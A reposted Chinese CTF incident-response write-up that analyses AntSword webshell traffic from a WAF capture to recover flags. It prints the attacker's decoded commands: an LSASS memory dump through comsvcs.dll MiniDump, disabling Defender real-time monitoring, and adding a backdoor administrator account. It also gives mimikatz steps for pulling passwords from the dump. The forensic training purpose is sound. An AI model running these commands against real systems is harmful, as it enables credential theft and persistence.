当前位置: 首页 > news >正文

【玄机-应急平台】第六章 流量特征分析-蚂蚁爱上树

【玄机-应急平台】第六章 流量特征分析-蚂蚁爱上树

    • 前言:
    • 1.管理员Admin账号的密码是什么?
    • 2.LSASS.exe的程序进程ID是多少?
    • 3.用户WIN101的密码是什么?

前言:

一个不错的应急平台可以练习,做点练习做记录。

[X] 🛰:ly3260344435
[X] 🐧:3260344435
[X] BiliBili:落寞的鱼丶
[X] 公众号:鱼影安全
[X] CSDN:落寞的魚丶
[X] 知识星球:中职-高职-CTF竞赛
欢迎师傅们交流学习~

应急响应小组成员老狼在 waf 上下载了一段流量,请你分析黑客攻击手法,并且解答下面问题

1.管理员Admin账号的密码是什么?

C:\phpStudy\PHPTutorial\WWW\onlineshop

导出HTTP数据流 发现product2.php这个是黑客上传的文件,因为他下面是Base64加密了

在这里插入图片描述

继续分析一下Base64特征 可以判断为蚁剑流量特征,过滤一下只看这个木马的数据包

在这里插入图片描述
这里ctrl+Fproduct2.php查看第一个包,依次对数据包进行全部解密

在这里插入图片描述

在这里插入图片描述

C:/phpStudy/PHPTutorial/WWW/onlineshop/database/onlineshop.sql
cd /d “C:/phpStudy/PHPTutorial/WWW/onlineshop”&ls&echo [S]&cd&echo [E]
cd /d “C:\phpStudy\PHPTutorial\WWW\onlineshop”&dir&echo [S]&cd&echo [E]
cd /d “C:\phpStudy\PHPTutorial\WWW\onlineshop”&whoami&echo [S]&cd&echo [E]
cd /d “C:\phpStudy\PHPTutorial\WWW\onlineshop”&whoami /priv&echo [S]&cd&echo [E]
cd /d “C:\phpStudy\PHPTutorial\WWW\onlineshop”&systeminfo&echo [S]&cd&echo [E]
cd /d “C:\phpStudy\PHPTutorial\WWW\onlineshop”&dir c:&echo [S]&cd&echo [E]
cd /d “C:\phpStudy\PHPTutorial\WWW\onlineshop”&dir c:\temp&echo [S]&cd&echo [E]
cd /d “C:\phpStudy\PHPTutorial\WWW\onlineshop”&net user&echo [S]&cd&echo [E]
cd /d “C:\phpStudy\PHPTutorial\WWW\onlineshop”&net localgroup administrators&echo [S]&cd&echo [E]
cd /d “C:\phpStudy\PHPTutorial\WWW\onlineshop”&net group “domain group” /domain&echo [S]&cd&echo [E]
cd /d “C:\phpStudy\PHPTutorial\WWW\onlineshop”&net group “domain admins” /domain&echo [S]&cd&echo [E]
cd /d “C:\phpStudy\PHPTutorial\WWW\onlineshop”&net view&echo [S]&cd&echo [E]
cd /d “C:\phpStudy\PHPTutorial\WWW\onlineshop”&net share&echo [S]&cd&echo [E]
cd /d “C:\phpStudy\PHPTutorial\WWW\onlineshop”&rundll32.exe comsvcs.dll, MiniDump 852 C:\Temp\OnlineShopBackup.zip full&echo [S]&cd&echo [E]
cd /d “C:\phpStudy\PHPTutorial\WWW\onlineshop”&dir c:\temp&echo [S]&cd&echo [E]
cd /d “C:\phpStudy\PHPTutorial\WWW\onlineshop”&ls&echo [S]&cd&echo [E]
cd /d “C:\phpStudy\PHPTutorial\WWW\onlineshop”&dir&echo [S]&cd&echo [E]
cd /d “C:\phpStudy\PHPTutorial\WWW\onlineshop”&copy store.php c:\temp&echo [S]&cd&echo [E]
cd /d “C:\phpStudy\PHPTutorial\WWW\onlineshop”&dir c:\temp&echo [S]&cd&echo [E]
cd /d “C:\phpStudy\PHPTutorial\WWW\onlineshop”&powershell -ep bypass Set-Mppreference -DisableRaltimeMonitoring $true&echo [S]&cd&echo [E]
cd /d “C:\phpStudy\PHPTutorial\WWW\onlineshop”&rundll32.exe comsvcs.dll, MiniDump 852 C:\temp\OnlineShopBackup.zip full&echo [S]&cd&echo [E]
C:/Temp/OnlineShopBack.zip
cd /d “C:/phpStudy/PHPTutorial/WWW/onlineshop”&dir c:\windows\system32&echo [S]&cd&echo [E]
cd /d “C:\phpStudy\PHPTutorial\WWW\onlineshop”&dir c:\windows\config&echo [S]&cd&echo [E]
cd /d “C:\phpStudy\PHPTutorial\WWW\onlineshop”&net user&echo [S]&cd&echo [E]
cd /d “C:\phpStudy\PHPTutorial\WWW\onlineshop”&net user admin Password1 /add&echo [S]&cd&echo [E]
cd /d “C:\phpStudy\PHPTutorial\WWW\onlineshop”&net localgroup administrators admin /add&echo [S]&cd&echo [E]
cd /d “C:\phpStudy\PHPTutorial\WWW\onlineshop”&whoami /all&echo [S]&cd&echo [E]

Y2QgL2QgIkM6XFxwaHBTdHVkeVxcUEhQVHV0b3JpYWxcXFdXV1xcb25saW5lc2hvcCImbmV0IHVzZXIgYWRtaW4gUGFzc3dvcmQxIC9hZGQmZWNobyBbU10mY2QmZWNobyBbRV0=  #去掉前两位 Base64解码"

在这里插入图片描述
在这里插入图片描述

FLAG:Password1

2.LSASS.exe的程序进程ID是多少?

rundll32.exe 可用于执行 DLL 文件,也能调用该文件中的内部函数,这里就调用了comsvcs.dll中的MiniDump函数 会生成一个lsass.dmp文件 存储了系统账号密码 mimiktz读取即可。
语法:

rundll32.exe comsvcs.dll MiniDump<输出路径> full

在这里插入图片描述
在这里插入图片描述

FLAG:852

3.用户WIN101的密码是什么?

这里我们需要把文件导出,上面解密我们发现存在OnlineShopBack.zip压缩包文件

加载mimiktz sekurlsa::minidump 1.dmp sekurlsa::logonpasswords full加载密文

在这里插入图片描述

在这里插入图片描述

FLAG:admin#123

相关文章:

  • kubernetes负载均衡---MetalLB
  • STM32项目分享:智能家居语音系统
  • python基于flask写后端接口、python接收请求、python作为服务端提供接口、python接收json数据或数组
  • JVM学习-JVM运行时参数
  • 24.6.2(动态开点线段树)
  • 股票数据集1-纳斯达克NASDAQ 100简介
  • 【java11】java11新特性之嵌套类
  • 打造无障碍网络体验:Edge 浏览器代理服务器设置指南
  • 【Unity实战篇 】 | Unity实现UGUI颜色渐变,支持透明渐变
  • 星舰第四次发射:历史性的一步
  • 入坑必看的几个嵌入式方向热点问题
  • Memory测试工具-stressapptest详解
  • 国内科技企业和机构发力AI研发,50余篇论文入选顶会ICML2024
  • 计数排序(排序终篇)
  • 人工智能在肿瘤预后预测中的最新研究进展|顶刊精析·24-06-07
  • 网络传输文件的问题
  • 「面试题」如何实现一个圣杯布局?
  • 【跃迁之路】【735天】程序员高效学习方法论探索系列(实验阶段492-2019.2.25)...
  • Angular6错误 Service: No provider for Renderer2
  • eclipse的离线汉化
  • flutter的key在widget list的作用以及必要性
  • JavaScript对象详解
  • java中具有继承关系的类及其对象初始化顺序
  • React组件设计模式(一)
  • SpingCloudBus整合RabbitMQ
  • spring boot 整合mybatis 无法输出sql的问题
  • SQL 难点解决:记录的引用
  • text-decoration与color属性
  • 对超线程几个不同角度的解释
  • 如何合理的规划jvm性能调优
  • 入门到放弃node系列之Hello Word篇
  • 详解移动APP与web APP的区别
  • 优化 Vue 项目编译文件大小
  • 400多位云计算专家和开发者,加入了同一个组织 ...
  • Semaphore
  • 曜石科技宣布获得千万级天使轮投资,全方面布局电竞产业链 ...
  • ​Java并发新构件之Exchanger
  • ​草莓熊python turtle绘图代码(玫瑰花版)附源代码
  • #NOIP 2014# day.1 生活大爆炸版 石头剪刀布
  • (a /b)*c的值
  • (bean配置类的注解开发)学习Spring的第十三天
  • (二十一)devops持续集成开发——使用jenkins的Docker Pipeline插件完成docker项目的pipeline流水线发布
  • (三)docker:Dockerfile构建容器运行jar包
  • (转)【Hibernate总结系列】使用举例
  • .Net - 类的介绍
  • .Net Web项目创建比较不错的参考文章
  • .NET 使用 XPath 来读写 XML 文件
  • .Net7 环境安装配置
  • .NET简谈设计模式之(单件模式)
  • .vollhavhelp-V-XXXXXXXX勒索病毒的最新威胁:如何恢复您的数据?
  • /etc/shadow字段详解
  • /etc/skel 目录作用
  • @EnableWebMvc介绍和使用详细demo
  • @RequestBody详解:用于获取请求体中的Json格式参数
  • @RequestParam,@RequestBody和@PathVariable 区别